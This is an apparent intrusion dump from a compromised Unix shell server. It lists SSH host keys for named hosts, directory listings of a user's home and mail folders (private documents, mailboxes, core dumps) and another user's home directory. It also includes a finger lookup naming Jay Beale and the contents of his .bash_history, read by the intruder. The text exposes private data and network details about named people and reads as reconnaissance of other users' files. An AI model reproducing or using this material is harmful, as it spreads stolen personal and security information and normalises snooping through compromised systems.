cgnKgNg+9hXhQ5k3jLbI1sSBzwb1HD70i7kvvMhMXcihGyhdZ7BBqKfIohdPodynKwwO3tebwJlE9rl cSWMTvAAAAIBgoyTRPIb1arSy20xzZO548c07v18PSdxMWCjL1urwqDl5zZq+SUrB7B2L5xPr6m6nz7 sTgYFI0ZnxvXJg0PilDAbYcggVcOPrdvcKpJQx9tcn1lPeRYgpCzB5iyqwD/tBhEp0wv4wbvFHgVDZk rIS6NFKvcitBxsO9TfdbPkGaw== dan at v-dakami-styro 64.81.64.164 ssh-dss AAAAB3NzaC1kc3MAAACBAJdeuSigqiBzh1FyeS3aP553guQwlVw2yKB2ybhOTAWydLg9hMTyEPP03Fv qYTH6DKDp4ZiitD3qyQ4IIW6OJESdJI0MoAsyx6StWbrBBbPtdPCp6evELMEHW3ij2YYQ9/XnYyKzbM nfTjj21v1UNOYp/tW9ruqpXgkR+f/VL8URAAAAFQCp+YXeAw40gBek+O0445aVHwL+0wAAAIBWZzk9k /smtfLXV0OI/y/qyJT4EUDCK0bRQirq3AOXR58rgon9/Q1UCyLdIqBLjZke0vaWJgSzGD/XdSLhx1Lv XYioQvvnyOLNVZDVP5koOB/pYIGQ9TwVwgBoL0X6ZCvnShZ648wu7aEInVLFP5TxxKHeAGQvx8tB5nB CwiKe6wAAAIA+AQp/BoSRwmSL2lus4zEEDsrmReHXZQwFcWGhkwLiMLPdw9HuHzMqfD7TBLwDGnOoEf Vl7vizxiaYUzVllSdiplkI4juJw+ApioItkjRdFo+X9KjNsQhtYe20yCvx4OFOIiB1miSawEbe34c7G M5VBKGQL4ClMLkpZ+W0gEe3EQ== scan.doxpara.com ssh-dss AAAAB3NzaC1kc3MAAACBALGVYHAJYr0DR4QX2YLhARTk0WW8HVnnR1xOIC6JeZbk89CM5F6P8VJKq2a hMkmGQkIqZtVvdmvjmfhxaTUS8lXtCM5rLO94yz7bgMrWtaoZTXCnEA1aBzhW3YMD/2ByPlJU2lO0Qe h09HFgIAquSYbCEYFE5lGVP5LTT5W1Y8SlAAAAFQC7x95hEymD5hB3jY+1zD6DfWcX5QAAAIBnqp1PQ WU0E3SiYzKB6lKqYm9rzh8ogkHcN6mBpW0kODNETt0xW5vXhE5hP83qX9ZF4WpCl6TSdmI72h8hOq48 jhUzqhuoqGepFYXlDUTK4LxzD77YRB2lohP+/eVkLKmzv5IevbOzAJFU98E207u9nIZnnYtEbRYy8oS khLbrDQAAAIEApkzPne/BmYH9h8pW0YAVxu4uM1j4QjsS0UrytJYPQKmPCgxUoypI/LYFB1yqZ1pzFw AjBhXUFENQuJ/Lmf8smtyt+ETUrUSsakPtEOuNq5+SHHXsyGNERDm455Su+cMu2+W4+/36Kq53TAYN7 YtggKFrh6DcqEl8rELCK6ytlYc= iahu.ca ssh-dss AAAAB3NzaC1kc3MAAACBAMyspq4LQUMKNdT4I98KQiO7M85kIg9IBCw+GLNiHIU98wM7JsiLDF+ntAy jQFRaxaEm/Vs2XIHDBNiIXyqhBEpNhMwDfrAsiB5Jyx8VdcVk23Y/oRENU63wCkOeIZDJ0Ed9ekv1/w /2RIWGXroqIuwtUTpCgv5EaVl0jLDQOAUzAAAAFQCLrFsMcvBmmTqEjpveYpziCNRYcQAAAIEAy8jVh k2u7P/40YcWs2ALHADw90S4mID6V8y8JoJchrnv+Lxm2u4no+3rMFe2vCCqyuR0/LyzAwB/83+qR8fD lz6Z6BWn86E/ln4+yWZEf5RazSQWDQuIxNmoQQhM3FTdMgY0Ygu2/IiC4Ud8Cgi2LBrKo/L+siOVwSS ZSof1DIMAAACAfuWlhxtuoJ6AVj6QYHb4GT8Ty6dwdkTbQYosOaFe3xVmWRM+I+VtMX5ThgHbpA28WS bupXNwi9k6cj/uakbnYxTfIkAKWz72C+YV6M61GZ41GctKFrkw4B2L2PtovqQOWOc44de6VbEJPTXg2 JgcRQPpmNvPGsFlq0vUuCEcjGo= www.doxpara.com ssh-dss AAAAB3NzaC1kc3MAAACBAMRswnXuWSrx3GKx4BZLu3ECQmH6/NMLPEVEpkA/0kYxkC/qaFFy78pJZrL UZPiv//agPo0Sy++blLY+RWYy0tUURIMos4OtxaPJpYRVvJt9LUCBnaZteqS1ySz/EQ3RGA68c9eivw xEj3p2leTgkm0glOYbJgUjYApbanLFVIWNAAAAFQD+79pVXrStiEizoqE2mauMxqrchwAAAIBJw1G93 S0YyoFDazaPh9HWosXnkHHu+rr8JbEs45JmuI6b+2PmuKZMKV74yj4/9IBI1SEQ46eStJRuf5xCI8Su LxGM2DD+Hq25a52sTZW/vm9l6RrpwodlO+60AUE8AYnVLrwfLeFuGxsUxnnFuzFC8lzxTAfaNuxnYE7 UESbVUgAAAIEAj2o/xnsFEsGZ3N3xvz5BwmX4eSP4Kzrm39Zx8UWdPWE/HnnFgabs+eYQq3Sny41wEd wTlwsNAnro88Q82w/BeApPvJZo0EluHVT8xAJUQUot2LseWo26q0cuqe7enaqW1e7SzVy26BsmiPI+i kelDYPPD37PuQpis3TxYEFqJXE= 127.0.0.1 ssh-dss AAAAB3NzaC1kc3MAAAEBAKC3olePMEjqA5NzNVG8ZoiG9QdFEdZzR44cv1Abz/yb4YRRLDHSDpf5ADx areqwXEadsSA9mWvEzZzSMv4EAkW2Vk9Rc1Z17HCCuaErQrYze/AxHHj33x13VUt73Kf1M8t40k3inr 0ou94yhgEAYmgQh7iRg/M1+X9tc2rPRkzEhZGjgFyCGAIDhq5SwtGAHILCuyb7hAJAq0iSu7tlz9XLI J9NDdkbaw+YuxfqZiiZdYJitMGotA+j162TGjq3XGiG7x0rCscF8V9exBfJ7mnDDzvXlG2dTS7H7TBv fyopkBLtOd14x8hAUJtWmbDWChXXlEQ4x8DjoXtLmME/2Y8AAAAVAMhO8csH950pSRsYRtoAiYRgyiv FAAABABMLbU/fTFcgeUG7kcBYMD/OQ9gOrR29d7lAXjKVwpgTwQYF+VdznD4x3LDdz/0gvwl0Hs+Kdu vsaayLhRmJZ0bVg4D717mB8wrb5OvHUuU0afh1XXpVICFF8WdGFtIbuL7H6VCpf4G1D+I4xcl2LAeue 6WbVN5gho0HKKvZikb9EQnVREUsWO9of2ikgE054dOTOlv+C+ic8csnkf8wsjDSZXlU5eTBePwKBnT3 HcKjM2tcjuyMAXazAH4ksXo8toFTAefCjCGJmffTTaX9jGIJKtZXRmqkK/+qngu9My9oOJlFCyW65ex Ca+02rdWV6Pgd0D2Hk6dVE3qscBUpXLQAAAEBAI+MvvMq5N6C9qRQNvYYmYOqNLTWC9kK8Iae884Lm+ Zyu96S8q8AF/qWa0hUd/9ugB7eD0CbkDBBNPCEE3lAH2onMhNKYgSbGvUOS/BrInbiwkjkvQ8yGMLF6 0fr7DRzTwGWTVoIBDgf9Fn45QSL+3S3FDDDNEoyr6kwDmvVsvCymIAQkfJUaDULt3hdvyZ+EauRGwZM EQfkpyJQYUuYsP5n9VQcGSxFsGAZLIjsHcAjCUQj1fILkXmMumw8D2efYNeCrF91G5UFL2WOHyVK0YY 71OcoO2fTAMj7qZxaj2PUT7zfz3+OXfuzkwXpsRmcEDEcu/ofC7jxPkdCnrhe3DI= [kesselrun.com]:2582 ssh-dss AAAAB3NzaC1kc3MAAACBAPQBgp++G7uf5K6G5uz++lqweRMuTLKV5wKY08k1CXFGU4ewFiRnCceFrcg Tc7W9c1HjyT4iNZDHCQCVpwp6IrWRoIEgr6e7uPut0uMavhbLsHHELIcQK6Z31z5wKKwmTQBRfTS+JM W19gqZSN3yo/6ZFsHhuUItfcfYekLoApr1AAAAFQCsMKXv28Lniuq0ktEhu6FA6Miy+wAAAIEAqoGdz UhTkURwmB6BYNskWHeZUfvJjS+Elojtx7wK4NhXg4T+2XYfe+b4mhSMkSGwCGMyfNHpQPgNgkaeBJgo 62epoJPNq3x3hY3h6AAP/boe9BLnbihQdoOjKfx/Kn6ZhmL3oF16zYy7xHA7WOUJxiGLC7RiUmfO+kU zNDAkPdsAAACAQLvUqTCx7XYf3enIALFCEl8wo05VKTAdlXRZJYFCTplFyhrS0IrNtF9556UD2jtILY Z9yarRvhcMF7O60vnvVG5r9iWOoIwvE6zWorr5jNtpr179auvdP2Kuo9NJl84b8qV6t6ZmNDraGRbV1 6SEv6GCgeqJraLgrMWWhmCDwkA= shaitan1.lightconsulting.com ssh-dss AAAAB3NzaC1kc3MAAACBAMMrzcx0ezsqHdn3cXWoJPNBnjZTsI4etOxp89TGeeceaaYkBpu0t7eVppr RUUZd0A5+HnfQtzpllePOKVZOEMT8tyBq2yzRb/5XXgtMbq0XpHdjeUeCDbRfJhfBs93MycUkACGiMQ kwJyYZzos2+uoMSW+oN7uI3+bZf4aAgbWbAAAAFQCkIvJw58KPEbb4ntpwGrBf/O+qYwAAAIB7HXGF5 P4RkT7Ve5Hynn+eUQR96TkxirUMwfp5GV91mOvLJvX2fMC6SKDhHoKG7P6aGh99hbpiji2WV6bca3vI gzWPtIEZomssaOlDFcITgjcvoJs42BtyD5iAXpNazs0CdfjZtyoA4dTIsh3BecxyxD4KYzfU3NPjL3q ZqF7iSAAAAIBRacmRtkoSlyG5hvSNLe6vkNOsjsncCUa05c5pWFBCn338FCf7hP44Qx7/ZtR5Dgu7Vg PwdHdKUrVItHIbgwTMpQXWq9WbKhGwt82dgov9+NisNvbNiMLPywthNelfD5U37+QnwYx3SMbMTOJ2i SkiIfvJzQj7BTvSYjo0ePNN7A== %ls -la total 7437192 -rw-r--r-- 1 effugas wheel 53 Mar 10 2005 +COMMENT -rw-r--r-- 1 effugas wheel 490 Mar 10 2005 +CONTENTS -rw-r--r-- 1 effugas wheel 307 Mar 10 2005 +DESC -r--r--r-- 1 effugas wheel 13080 Mar 10 2005 +MTREE_DIRS -rw-r--r-- 1 effugas wheel 1299747 Jul 16 2005 - -rw-r--r-- 1 effugas wheel 0 Sep 28 2005 -u drwx------ 68 effugas wheel 5120 Jul 17 11:43 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 effugas wheel 434 Jan 13 2008 .Xauthority -rw-r--r-- 1 effugas wheel 0 Oct 24 2006 .addressbook -rw------- 1 effugas wheel 2285 Oct 24 2006 .addressbook.lu -rw------- 1 effugas wheel 12839 Jul 18 06:18 .bash_history drwxr-xr-x 7 effugas wheel 512 Jun 13 2008 .bittorrent drwxr-xr-x 6 effugas wheel 512 Feb 6 14:05 .cpan drwx------ 2 effugas wheel 512 Apr 23 2005 .elinks drwx------ 2 effugas jb 512 Sep 24 2005 .elm -rw-r--r-- 1 effugas wheel 63520 Sep 29 2005 .fonts.cache-1 drwx------ 4 effugas wheel 512 Feb 15 2006 .gaim drwx------ 2 effugas wheel 512 Mar 19 00:41 .gnupg -rw------- 1 effugas wheel 302298 Dec 30 2005 .grepmail-cache -rw------- 1 effugas wheel 67 Jul 6 2008 .lesshst -rw-r--r-- 1 effugas wheel 133 Jun 10 2006 .mailboxlist -rw------- 1 effugas wheel 7465 Jun 3 06:23 .mysql_history -rw------- 1 effugas wheel 221 Sep 10 2004 .nessusrc -rw-r--r-- 1 effugas wheel 28672 Sep 2 2004 .nomde_ex.pl.swo -rw-r--r-- 1 effugas wheel 16384 Sep 7 2004 .nomde_ex.pl.swp drwx------ 8 effugas wheel 512 Dec 5 2005 .openwebmail -rw------- 1 effugas wheel 1592 Apr 20 19:28 .pine-interrupted-mail -rw------- 1 effugas wheel 17165 Jul 17 11:38 .pinerc -rw-r--r-- 1 effugas wheel 816 Jan 8 2006 .procmailrc -rw------- 1 effugas wheel 1024 Jan 7 2009 .rnd -rw-r--r-- 1 effugas wheel 12 Apr 4 2005 .slirprc drwx------ 2 effugas wheel 512 Jul 12 14:02 .spamassassin drwxr-xr-x 2 effugas wheel 512 Nov 9 2005 .ssh drwxr-xr-x 3 effugas wheel 512 Jun 23 2007 .subversion -rw------- 1 effugas jb 256 Dec 5 2005 .vacation.msg drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 .vnc -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg -rw-r--r-- 1 effugas wheel 5714 Sep 5 2007 110eclipse.jpg.1 -rw-r--r-- 1 effugas wheel 4170702 Dec 17 2006 17-Day tripper.mp3 -rw-r--r-- 1 effugas wheel 18163 Oct 10 2006 399299 drwx------ 11 effugas wheel 2048 Jan 14 2007 4 -rw------- 1 effugas wheel 1244999 Jul 25 2005 Admin Noise -rwx------ 1 effugas wheel 19253 May 20 2007 Alpha Man Conversation & Persuasion.torrent drwxr-xr-x 7 effugas wheel 512 Jun 14 2008 BitTorrent Downloads drwxr-xr-x 11 root wheel 1024 Jan 13 2007 BitTorrent-4.20.9 -rw------- 1 effugas wheel 9215553 Aug 12 2006 CCCP -rw-r--r-- 1 effugas wheel 136192 Aug 12 2007 Cingular_Customized APN info and price sheet.doc -rw------- 1 effugas wheel 11072756 Sep 15 2006 Crypto -rwx------ 1 effugas wheel 18865 Nov 4 2006 David X Seduction and Relationships Seminar.torrent -rw-r--r-- 1 effugas wheel 64512 Jan 6 2006 DiogeNeS.doc -rw-r--r-- 1 effugas wheel 27648 May 10 13:01 Doxpara-NDT term sheet.doc -rw------- 1 effugas wheel 425406 Jul 25 2005 Drafts -rw-r--r-- 1 effugas wheel 27648 Aug 12 2007 Encryption sw_SecurStar info.doc lrwxr-xr-x 1 effugas wheel 29 Jan 8 2006 Funsec -> /usr/home/effugas/mail/Funsec -rw------- 1 effugas mail 10369669 Sep 25 2005 Gap -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Drafts -rw------- 1 effugas wheel 324536 Nov 18 2005 INBOX.Sent -rw------- 1 effugas wheel 496 Sep 30 2005 INBOX.Trash -rwx------ 1 effugas wheel 20767 Oct 24 2006 Juggler - Charisma Arts Bootcamp.avi.torrent -rw-r--r-- 1 effugas wheel 403486571 Jul 13 2006 Junk -rw-r--r-- 1 effugas wheel 379402660 Nov 17 2005 Junk_toobig -rw------- 1 effugas wheel 280301055 Aug 21 2006 Known drwxr-xr-x 2 effugas wheel 512 Sep 26 2005 MT-3.2-en_US -rwx------ 1 effugas wheel 1377924 Sep 26 2005 MT-3.2.tar.gz drwxrwxrwx 2 effugas jb 512 Sep 24 2005 Mail -rw-r--r-- 1 effugas wheel 1438 Oct 4 2006 Makefile -rw------- 1 effugas wheel 229972323 Sep 21 2006 Older Mail -rw------- 1 effugas wheel 181797360 Jul 25 2005 Orig_Older -rw------- 1 effugas wheel 492 Jul 25 2005 Outbox -rw-r--r-- 1 effugas wheel 200578 Aug 12 2007 PhoneCrypt_docs_pc.pdf -rwx------ 1 effugas wheel 28554 Nov 18 2006 PickUp 101 - He Said, She Said - Volume 1.torrent drwxr-xr-x 2 effugas wheel 512 Oct 2 2005 PyFlickrUploadr -rw-r--r-- 1 effugas wheel 7164 Oct 2 2005 PyFlickrUploadr.tar.gz lrwxr-xr-x 1 effugas wheel 31 Jan 8 2006 RouteSec -> /usr/home/effugas/mail/RouteSec -rw-r--r-- 1 effugas wheel 1352443 Mar 1 2008 Secret of Mana.zip -rw------- 1 effugas wheel 144765683 Jul 26 2006 Sent -rw------- 1 effugas wheel 68609225 Jul 25 2005 Sent Items -rw-r--r-- 1 effugas wheel 0 Sep 25 2005 Spam -rw-r--r-- 1 effugas wheel 55823056 Aug 10 2006 Trash drwxr-xr-x 2 effugas wheel 512 Oct 28 2005 ack drwxr-xr-x 2 effugas wheel 1024 Aug 8 2007 airhook-2 -rw-r--r-- 1 effugas wheel 28282 Apr 14 2003 airhook-2.tar.gz drwxr-xr-x 2 effugas wheel 512 Sep 8 2008 ap drwxr-xr-x 2 effugas wheel 1536 Feb 21 2008 arse -rw-r--r-- 1 effugas wheel 614 Jan 19 2005 authorized_keys -rw-r--r-- 1 effugas wheel 8048 Jan 23 2006 av2.txt -rw-r--r-- 1 effugas wheel 2641 Oct 6 2006 back.pem drwxr-xr-x 2 effugas wheel 1024 Jul 25 2006 bin -rw-r--r-- 1 effugas wheel 1801 Feb 23 2008 boing_seq.txt -rwx------ 1 effugas wheel 214576 Jul 25 2006 bplex_0_dev-src.gz -rw-r--r-- 1 effugas wheel 1662 Sep 8 2008 browserRedirect?url=itms%3A%2F%2Fax.phobos.apple.com.edgesuite.net%2FWebObjects%2FMZStore.woa%2Fwa%2FviewGenre%3Fid%3D35 drwxr-xr-x 2 effugas wheel 512 Jun 11 2006 ca drwxr-xr-x 2 effugas wheel 512 Sep 24 2006 cl drwxr-xr-x 60 effugas wheel 4096 Jul 6 2008 content drwxrwxrwx 2 effugas wheel 512 Jul 8 2008 db -rw-r--r-- 1 effugas wheel 963360 Sep 26 2005 db.dump -rw------- 1 effugas wheel 2416 Apr 27 13:07 dead.letter -rw-r--r-- 1 effugas wheel 718 Feb 22 2008 del.txt -rw-r--r-- 1 effugas wheel 4196 Feb 23 2008 del_seq.txt -rw-r--r-- 1 effugas wheel 4188 Feb 23 2008 del_ts.txt -rw-r--r-- 1 effugas wheel 10980 Sep 19 2006 dell_ssl2.txt -rw------- 1 effugas wheel 815104 Feb 11 2008 dig.core drwxr-xr-x 2 effugas wheel 1024 Jul 30 2006 dissoc-0.1 -rw-r--r-- 1 effugas wheel 51652 Jul 2 2001 dissoc-0.1.tar.gz -rw-r--r-- 1 effugas wheel 193 Oct 4 2006 distinfo -rwx------ 1 effugas wheel 7211132 Mar 15 2008 dk2_cli.pcap drwxr-xr-x 33 effugas wheel 3584 Jul 13 11:47 dl -rw-r--r-- 1 effugas wheel 4338 Mar 30 2005 dns.cap -rw-r--r-- 1 effugas wheel 4338 Apr 13 15:23 dns.pcap -rwx------ 1 effugas wheel 3793316 Jun 15 2006 domain_login_esp.cap drwxr-xr-x 2 effugas wheel 512 Dec 23 2008 dprint -rw-r--r-- 1 effugas wheel 615112704 Nov 5 2006 en_winxp_pro_with_sp2.iso -rw-r--r-- 1 effugas wheel 1967 Feb 23 2008 fark_seq.txt -rw-r--r-- 1 effugas wheel 1984 Feb 23 2008 fark_ts.txt drwxr-xr-x 2 effugas wheel 512 Oct 4 2006 files -rw------- 1 effugas jb 209744 Sep 25 2005 filtered -rw------- 1 effugas wheel 37106364 Sep 26 2005 fire_inbox -rw-r--r-- 1 effugas wheel 7385211 Oct 28 2005 foo.pgp -rw-r--r-- 1 effugas wheel 10485784 Jun 19 2006 foo.xml -rw-r--r-- 1 effugas wheel 12920 Feb 22 2008 g_seq.txt -rw-r--r-- 1 effugas wheel 12848 Feb 22 2008 g_ts.txt -rw------- 1 effugas jb 2909341 Jan 12 2006 gah drwxr-xr-x 9 effugas wheel 1536 Aug 11 2005 gaim-1.5.0 -rw-r--r-- 1 effugas wheel 6123237 Aug 11 2005 gaim-1.5.0.tar.bz2 -rw------- 1 effugas wheel 7999488 Sep 29 2005 gaim.core -rw-r--r-- 1 effugas wheel 1588 Jan 1 2006 ghet_ip.c drwxrwxr-x 2 effugas wheel 512 Sep 30 2005 ghetto drwxr-xr-x 2 effugas wheel 512 Sep 25 2005 gml -rwxr-xr-x 1 effugas wheel 3395 Jun 17 2004 gml.py drwxr-xr-x 2 effugas wheel 512 Aug 23 2007 haxedit -rwx------ 1 effugas wheel 40960 Aug 27 2007 haxedit.tgz -rwxr-xr-x 1 effugas wheel 5312 Apr 6 14:20 heh -rw-r--r-- 1 effugas wheel 168 Apr 6 14:20 heh.cpp drwxr-xr-x 2 effugas wheel 512 Apr 26 00:32 hmm -rw-r--r-- 1 effugas wheel 1636602 Oct 28 2005 hmm.txt -rw-r--r-- 1 effugas wheel 2200 Jan 21 2008 hoho.txt -rw-r--r-- 1 effugas wheel 15748938 Nov 24 2007 huh_shai.gz drwxr-xr-x 5 effugas wheel 512 Jan 24 2006 imgSeek-0.8.6 -rw-r--r-- 1 effugas wheel 396056 Nov 14 2006 imgSeek-0.8.6.tar.bz2 -rw-r--r-- 1 effugas wheel 618624 Aug 12 2007 imsi-capture_phonecrypt_secured.wav -rw-r--r-- 1 effugas wheel 74086 Jun 10 2006 index.php -rw-r--r-- 1 effugas wheel 36115 Oct 5 2006 index.txt -rwxr-xr-x 1 effugas wheel 2739 Nov 7 2005 info_bot.pl drwxr-xr-x 2 effugas wheel 133120 Dec 5 2006 is -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.1 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.2 -rw-r--r-- 1 effugas wheel 43 May 15 2007 isf.gif.3 -rw-r--r-- 1 effugas wheel 764567 Nov 26 2007 jm.zone drwxr-xr-x 2 effugas wheel 512 Oct 8 2007 johnny -rw-r--r-- 1 effugas wheel 0 Sep 8 2008 known_hosts drwxr-xr-x 2 effugas wheel 512 Mar 8 2005 lib drwxr-xr-x 7 effugas wheel 1024 Aug 29 2008 libspf2-1.2.5 -rw-r--r-- 1 effugas wheel 517945 Feb 23 2005 libspf2-1.2.5.tar.gz -rwx------ 1 effugas wheel 3548321 Jan 21 2008 local3.log -rw-r--r-- 1 effugas wheel 166676 Feb 22 2008 log.bin -rw-r--r-- 1 effugas wheel 22722620 Dec 8 2005 log.txt -rw-r--r-- 1 effugas wheel 10763 Mar 29 18:48 login drwxr-xr-x 3 effugas wheel 2048 Dec 5 2006 m -rw-r--r-- 1 effugas wheel 182 Feb 28 2006 mae.txt drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 mail drwxrwxrwx 2 effugas jb 512 Dec 31 2005 mail_oh -rw-r--r-- 1 effugas wheel 2765 Jun 1 2008 mangle.c -rw------- 1 effugas jb 7385213 Oct 28 2005 mater.pgp -rw-r--r-- 1 effugas wheel 66 Oct 28 2005 mater.pgp.2 -rwxr-xr-x 1 effugas wheel 4961 Apr 14 17:31 mem -rw-r--r-- 1 effugas wheel 231 Apr 14 17:31 mem.c -rw-r--r-- 1 effugas wheel 1002 Jul 6 2008 migrate.pl drwxr-xr-x 2 effugas wheel 512 Jan 5 2008 mov drwxr-xr-x 7 effugas wheel 512 Sep 29 2005 msn drwxr-xr-x 2 effugas wheel 512 Sep 29 2005 msn-bot -rw-r--r-- 1 effugas wheel 16973 Jul 16 2003 msn-bot.zip drwxr-xr-x 2 effugas wheel 512 Jan 13 2006 music drwxr-xr-x 4 effugas wheel 4163072 Feb 2 2007 mypix -rw-r--r-- 1 effugas wheel 7096 Feb 22 2008 mys.txt -rw-r--r-- 1 effugas wheel 11102 Feb 23 2008 mys_seq.txt -rw-r--r-- 1 effugas wheel 1032 Feb 23 2008 mys_ts.txt drwxr-xr-x 7 effugas wheel 1024 Feb 13 2007 netcat-0.7.1 -rwx------ 1 effugas wheel 398872 Feb 13 2007 netcat-0.7.1.tar.gz drwxr-xr-x 2 effugas wheel 512 Jun 5 2007 new -rw-r--r-- 1 effugas wheel 0 Jun 11 2006 newcert.pem -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.cer -rw-r--r-- 1 effugas wheel 1180 Jun 11 2006 newreq.pem -rwxr-xr-x 1 effugas wheel 10371 Nov 15 2006 nomde.pl drwxr-xr-x 5 effugas wheel 512 Sep 17 2004 ophcrack_1_0a -rw-r--r-- 1 effugas wheel 5114862 Sep 17 2004 ophcrack_1_0a.zip -rw-r--r-- 1 effugas wheel 139283 Jan 10 2006 out.txt -rw------- 1 effugas jb 138418 Sep 28 2005 penn -rw------- 1 root wheel 999878656 Nov 25 2008 perl5.8.8.core -rw------- 1 effugas wheel 91009024 Jan 26 17:29 pine.core drwxr-xr-x 3 effugas wheel 58368 Feb 2 2007 pix drwxr-xr-x 5 effugas wheel 512 Jan 26 2007 pix2 -rw-r--r-- 1 effugas wheel 554 Oct 4 2006 pkg-descr -rw-r--r-- 1 effugas wheel 853 Oct 4 2006 pkg-plist drwxr-xr-x 3 effugas wheel 512 Jun 5 2007 s4 -rw-r--r-- 1 effugas wheel 378156 Mar 14 2006 scapy.py drwxr-xr-x 8 effugas wheel 2560 Oct 8 2006 screen-4.0.2 -rw-r--r-- 1 effugas wheel 840519 Jan 27 2004 screen-4.0.2.tar.gz drwxr-xr-x 3 effugas wheel 512 Sep 27 2005 sdba -rwxr-xr-x 1 effugas wheel 486449 Jul 12 2006 sequitur_simple.exe drwxr-xr-x 2 effugas wheel 512 Feb 6 14:10 shmoo -rw-r--r-- 1 effugas wheel 387800 Feb 13 2007 socat-1.5.0.0.tar.gz -rw-r--r-- 1 effugas wheel 0 Dec 30 2005 spam_first drwxr-xr-x 2 effugas wheel 2560 Jul 25 2006 src -rw-r--r-- 1 effugas wheel 144 Sep 27 2005 subcheck.pl -rw-rw---- 1 effugas mail 148812841 Dec 30 2005 superchunk_1 -rw-rw---- 1 effugas mail 7489304 Dec 31 2005 superchunk_2 drwxr-xr-x 2 effugas wheel 512 Apr 20 19:32 swap -rw-r--r-- 1 effugas wheel 117 Jul 6 2008 tcheck.pl -rw-r--r-- 1 effugas wheel 1025 Feb 22 2008 test.txt drwxr-xr-x 2 effugas wheel 512 Apr 3 15:48 tmp -rw-r--r-- 1 root wheel 221202 Nov 25 2008 tmp1 -rw-r--r-- 1 root wheel 225530 Nov 25 2008 tmp2 drwxr-xr-x 2 effugas wheel 512 Nov 11 2008 tor-audit drwxr-xr-x 5 effugas wheel 1536 Jun 23 2007 trunk -rwxr-xr-x 1 effugas wheel 7232 Feb 13 2007 udpfwd -rw-r--r-- 1 effugas wheel 3431 Feb 13 2007 udpfwd.c drwxr-xr-x 20 effugas wheel 1536 Jun 29 10:16 unbound-1.3.0 -rw-r--r-- 1 effugas wheel 4059848 Jun 11 04:00 unbound-latest.tar.gz -rw-r--r-- 1 effugas wheel 87 May 17 2007 url.txt drwxr-xr-x 2 effugas wheel 512 Sep 20 2005 walker-3.8 -rw-r--r-- 1 effugas wheel 18478 Sep 20 2005 walker-3.8.tar.gz -rwx------ 1 effugas wheel 24256 Jun 18 2006 webdav.txt -rwx------ 1 effugas wheel 21710 Jun 18 2006 webdav.xml drwxr-xr-x 2 effugas wheel 512 Nov 7 2005 wtf -rw-r--r-- 1 effugas wheel 92 May 30 2007 wtf.pl drwxr-xr-x 2 effugas wheel 1024 Jul 28 2006 xray -rw-r--r-- 1 effugas wheel 12840 Feb 23 2008 yahoo_seq.txt -rw-r--r-- 1 effugas wheel 13002 Feb 23 2008 yahoo_ts.txt %ls -la mail total 4656348 drwxr-xr-x 3 effugas wheel 512 Jul 17 11:39 . drwx------ 68 effugas wheel 5120 Jul 17 11:43 .. drwx------ 4 effugas wheel 512 Oct 27 2006 .imap -rw------- 1 effugas wheel 6 Oct 7 2006 .subscriptions -rw------- 1 effugas wheel 101091425 May 10 11:00 Funsec -rw------- 1 effugas wheel 3758946 Feb 23 11:13 RouteSec -rw------- 1 effugas wheel 1297160537 Jul 12 14:02 Spam -rw------- 1 effugas wheel 26177660 May 6 14:13 Subject: -rw------- 1 effugas wheel 325849488 Jul 26 2008 Trash -r-------- 1 effugas wheel 0 Nov 15 2006 _PyR,xy1WFB.pmjm.com -rw-r--r-- 1 effugas wheel 46592 Apr 18 2006 dan.doc -rw------- 1 effugas wheel 190010509 Apr 27 14:02 drone -rw------- 1 effugas jb 66078 Apr 18 2006 galley.txt -rw------- 1 effugas wheel 0 Jan 29 2006 mail-trash -rw------- 1 effugas wheel 1884 Dec 31 2005 other -rw------- 1 effugas wheel 12310586 Jul 17 11:39 sent-mail -rw------- 1 effugas wheel 0 Jan 8 2006 spam-mail -rw------- 1 effugas wheel 296699245 Apr 18 02:36 to_first -rw------- 1 effugas wheel 129442683 May 10 08:03 to_other -rw------- 1 effugas wheel 0 Jan 7 2006 virus-mail %ls -lah /var/mail/effugas -rw-rw---- 1 effugas mail 1.4G Jul 17 11:41 /var/mail/effugas %cd /home%ls -la jb total 744332 drwxr-xr-x 6 mooseaccess jb 512 Apr 6 2004 . drwxr-xr-x 33 root wheel 1024 Jul 13 14:24 .. -rw------- 1 root jb 6109 Sep 29 2006 .bash_history -rw-r--r-- 1 mooseaccess jb 771 Sep 9 2004 .cshrc -rw-r--r-- 1 mooseaccess jb 255 Sep 9 2004 .login -rw-r--r-- 1 mooseaccess jb 165 Sep 9 2004 .login_conf -rw------- 1 mooseaccess jb 371 Sep 9 2004 .mail_aliases -rw-r--r-- 1 mooseaccess jb 331 Sep 9 2004 .mailrc drwxr-xr-x 8 mooseaccess jb 512 Apr 6 2004 .openwebmail -rw-r--r-- 1 mooseaccess jb 801 Sep 9 2004 .profile -rw------- 1 mooseaccess jb 276 Sep 9 2004 .rhosts -rw------- 1 root jb 1024 Sep 12 2004 .rnd -rw-r--r-- 1 mooseaccess jb 852 Sep 9 2004 .shrc drwx------ 2 root jb 512 Sep 10 2006 .ssh drwxr-xr-x 2 root jb 512 Nov 27 2004 airhook-2 -rw-r--r-- 1 root jb 28282 Nov 27 2004 airhook-2.tar.gz drwxr-xr-x 2 mooseaccess jb 512 Apr 6 2004 mail -rw------- 1 root jb 900104 Nov 18 2004 paketto-1.10.tar.gz -rw-r--r-- 1 root jb 365 Sep 12 2006 test-scan-ddi-for-quoting.gnmap -rw-r--r-- 1 root jb 390 Sep 12 2006 test-scan-ddi-for-quoting.nmap -rw-r--r-- 1 root jb 1023 Sep 12 2006 test-scan-ddi-for-quoting.xml -rw-r--r-- 1 jay jay 1412325 May 9 2005 vpnforjay.tar.gz -rw-r--r-- 1 root jb 378449920 Sep 6 2006 win2k.iso %finger jb Login: jb Name: Jay "Ask DanK" Beale Directory: /home/jb Shell: /sbin/nologin Last login Mon Jun 29 10:00 (PDT) on ttyp6 from cpe-72-225-172- No Mail. No Plan. %cat jb/.bash_history ls cd /tmp ls ls -al ls -al | grep jb cd exit ls cd / ls cd space ls cd iso/ ls pwd exit tcpdump dst host 66.92.163.118 tcpdump -n dst host 66.92.163.118 tcpdump -n dst host 66.92.163.118 